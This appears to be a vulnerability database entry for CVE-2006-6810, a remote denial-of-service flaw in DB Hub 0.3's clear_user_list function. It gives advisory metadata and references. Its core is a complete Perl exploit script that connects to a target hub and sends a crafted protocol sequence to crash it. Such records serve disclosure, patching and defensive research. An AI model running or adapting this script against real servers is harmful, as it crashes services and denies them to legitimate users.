DB Hub 'src/main.c' clear_user_list Function Denial-of-Service Vulnerability

Vulnerability ID: 1111880    Vulnerability type: Boundary condition error
Published: 2006-12-27    Updated: 2007-01-04
CVE ID: CVE-2006-6810    CNNVD-ID: CNNVD-200612-599
Platform: Multiple    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/29362
https://www.securityfocus.com/bid/21791
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-599
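|Vulnerability details
An unspecified vulnerability in the clear_user_list function in src/main.c in DB Hub 0.3 allows remote attackers to cause a denial of service (application crash) via crafted network traffic that triggers memory corruption.
|Exploit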
source: http://www.securityfocus.com/bid/21791/info

A remote denial-of-service vulnerability affects the DB Hub application because of a memory-corruption flaw when the application attempts to process specially crafted network traffic.

An attacker may exploit this issue to crash affected applications, denying service to legitimate users.

DB Hub version 0.3 is vulnerable to this issue; other versions may also be affected.

#!/usr/bin/perl
# DB Hub (http://dbhub.ir.pl/) DoS exploit 
# Critical Security (http://www.critical.lt)

use IO::Socket;

my $host = $ARGV[0];
my $port = $ARGV[1];
my $nick = $ARGV[2];

print q( 
----------------------------------------------
|  DB Hub (http://dbhub.ir.pl/) DoS exploit  |
----------------------------------------------
);

if (@ARGV < 3) { 
  print "Usage: perl crit_dbhub.pl host port nick\n";
  exit();
}

if ($connect = IO::Socket::INET->new(PeerAddr => $host, 
                                     PeerPort => $port, 
                                     Proto => tcp,
                                     Timeout => 5 ) 
   or die "[-] Can't connect\n") 
    { 
     print "[+] Connected!\n";
    }

$res = $connect->recv($text,200);
if ($text =~ /Lock/) { $connect->send("\$Key vistiek_netikrina|\$ValidateNick $nick|"); }
$connect->send("\$Version 20|\$MyINFO \$ALL $nick  <++ V:0.674,M:A,H:1/0/0,S:11>\$ \$DSL.\$\$19313847685\$|\$GetNickList|");
$connect->send("<$nick>!|"); # xixi
print "[+] Data sent\n"; 
while($text) { $res = $connect->recv($text,200); }
print "[+] Done\n";
|Affected products
DB Hub DB Hub 0.3
|References

Source: BID
Name: 21791
Link: http://www.securityfocus.com/bid/21791
Source: MISC
Link: http://www.critical.lt/research/crit_dbhub.pl
Source: MISC
Link: http://www.critical.lt/?vuln/548
Source: XF
Name: dbhub-clearuserlist-dos(31172)
Link: http://xforce.iss.net/xforce/xfdb/31172
Source: VUPEN
Name: ADV-2006-5198
Link: http://www.frsirt.com/english/advisories/2006/5198
Source: VIM
Name: 20070103 Provable vendor ACK for CVE-2006-6810 (DB Hub DoS)
Link: http://www.attrition.org/pipermail/vim/2007-January/001204.html
Source: SECUNIA
Name: 23489
Link: http://secunia.com/advisories/23489
Source: mieszkancy.ds.pg.gda.pl
Link: http://mieszkancy.ds.pg.gda.pl/~centurion/darkbot/stat/click.php?id=22
Source: dbhub.ir.pl
Link: http://dbhub.ir.pl/